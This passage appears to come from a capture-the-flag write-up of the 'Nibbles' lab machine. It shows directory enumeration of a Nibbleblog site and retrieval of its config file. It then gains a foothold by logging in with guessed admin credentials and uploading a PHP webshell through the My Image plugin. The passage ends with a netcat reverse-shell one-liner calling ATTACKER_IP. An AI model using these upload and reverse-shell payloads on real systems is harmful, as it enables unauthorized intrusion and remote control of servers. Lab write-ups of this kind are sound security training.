Now we have a valid username (admin) but no password. Note the second blacklist entry: 10.10.14.117 was blacklisted after 5 failed logins, so brute-forcing admin.php locks you out. Additional directory enumeration against the root of the web application:

  sc ./gobuster/gobuster dir -u http://10.129.224.196/ --wordlist ~/Documents/sc/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.224.196/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /Users/rvn/Documents/sc/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 293]
/.htaccess            (Status: 403) [Size: 298]
/.htpasswd            (Status: 403) [Size: 298]
/index.html           (Status: 200) [Size: 93]
/server-status        (Status: 403) [Size: 302]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================

Check the other file in content/private, config.xml:

  sc curl -s http://10.129.224.196/nibbleblog/content/private/config.xml | xmllint --format -
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<config>
  <name type="string">Nibbles</name>
  <slogan type="string">Yum yum</slogan>
  <footer type="string">Powered by Nibbleblog</footer>
  <advanced_post_options type="integer">0</advanced_post_options>
  <url type="string">http://10.10.10.134/nibbleblog/</url>
  <path type="string">/nibbleblog/</path>
  <items_rss type="integer">4</items_rss>
  <items_page type="integer">6</items_page>
  <language type="string">en_US</language>
  <timezone type="string">UTC</timezone>
  <timestamp_format type="string">%d %B, %Y</timestamp_format>
  <locale type="string">en_US</locale>
  <img_resize type="integer">1</img_resize>
  <img_resize_width type="integer">1000</img_resize_width>
  <img_resize_height type="integer">600</img_resize_height>
  <img_resize_quality type="integer">100</img_resize_quality>
  <img_resize_option type="string">auto</img_resize_option>
  <img_thumbnail type="integer">1</img_thumbnail>
  <img_thumbnail_width type="integer">190</img_thumbnail_width>
  <img_thumbnail_height type="integer">190</img_thumbnail_height>
  <img_thumbnail_quality type="integer">100</img_thumbnail_quality>
  <img_thumbnail_option type="string">landscape</img_thumbnail_option>
  <theme type="string">simpler</theme>
  <notification_comments type="integer">1</notification_comments>
  <notification_session_fail type="integer">0</notification_session_fail>
  <notification_session_start type="integer">0</notification_session_start>
  <notification_email_to type="string">admin@nibbles.com</notification_email_to>
  <notification_email_from type="string">noreply@10.10.10.134</notification_email_from>
  <seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
  <seo_site_description type="string"/>
  <seo_keywords type="string"/>
  <seo_robots type="string"/>
  <seo_google_code type="string"/>
  <seo_bing_code type="string"/>
  <seo_author type="string"/>
  <friendly_urls type="integer">0</friendly_urls>
  <default_homepage type="integer">0</default_homepage>
</config>

Nibbles - Initial Foothold

  • log in to /nibbleblog/admin.php as admin:nibbles and upload a PHP file containing <?php system('id'); ?> through the My Image plugin.
  • the upload succeeds, but the page shows a stack of GD warnings because the file is not a real image:
Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26
 
Warning: imagesy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 27
 
Warning: imagecreatetruecolor(): Invalid image dimensions in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 117
 
Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 118
 
Warning: imagejpeg() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 43
 
Warning: imagedestroy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 80
  • curl the uploaded file: the plugin stores it as image.php and our code runs as the web server user, so we have remote code execution on the web server.
  sc curl http://10.129.224.196/nibbleblog/content/private/plugins/my_image/image.php
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
  • edit the php file for a reverse shell (ATTACKER_IP is our own host, where the nc listener below runs; the connection must come back to us, not to the target)
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 9443 >/tmp/f"); ?>
  • start the netcat listener in our terminal before requesting image.php
nc -lvnp 9443